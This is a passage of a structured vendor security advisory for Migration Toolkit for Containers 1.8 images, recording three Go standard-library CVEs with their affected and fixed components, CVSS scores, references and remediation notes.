"rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", }, product_reference: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", }, product_reference: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", }, product_reference: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", }, product_reference: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", }, product_reference: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, ], }, vulnerabilities: [ { cve: "CVE-2024-24790", cwe: { id: "CWE-115", name: "Misinterpretation of Input", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292787", }, ], notes: [ { category: "description", text: "A flaw was found in the Go language standard library net/netip. The method Is*() (IsPrivate(), IsPublic(), etc) doesn't behave properly when working with IPv6 mapped to IPv4 addresses. The unexpected behavior can lead to integrity and confidentiality issues, specifically when these methods are used to control access to resources or data.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", title: "Vulnerability summary", }, { category: "other", text: "This CVE has been marked as moderate as for our products a network-based attack vector is simply impossible when it comes to golang code,apart from that as per CVE flaw analysis reported by golang, this only affects integrity and confidentiality and has no effect on availability, hence CVSS has been marked as such.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24790", }, { category: "external", summary: "RHBZ#2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24790", url: "https://www.cve.org/CVERecord?id=CVE-2024-24790", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24790", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 6.7, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses", }, { cve: "CVE-2024-24791", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-07-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2295310", }, ], notes: [ { category: "description", text: "A flaw was found in Go. The net/http module mishandles specific server responses from HTTP/1.1 client requests. This issue may render a connection invalid and cause a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "net/http: Denial of service due to improper 100-continue handling in net/http", title: "Vulnerability summary", }, { category: "other", text: "An attacker would need to control a malicious server and induce a client to connect to it, requiring some amount of preparation outside of the attacker's control. This reduces the severity score of this flaw to Moderate.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24791", }, { category: "external", summary: "RHBZ#2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24791", url: "https://www.cve.org/CVERecord?id=CVE-2024-24791", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24791", }, { category: "external", summary: "https://go.dev/cl/591255", url: "https://go.dev/cl/591255", }, { category: "external", summary: "https://go.dev/issue/67555", url: "https://go.dev/issue/67555", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", url: "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ", }, ], release_date: "2024-07-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "net/http: Denial of service due to improper 100-continue handling in net/http", }, { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: 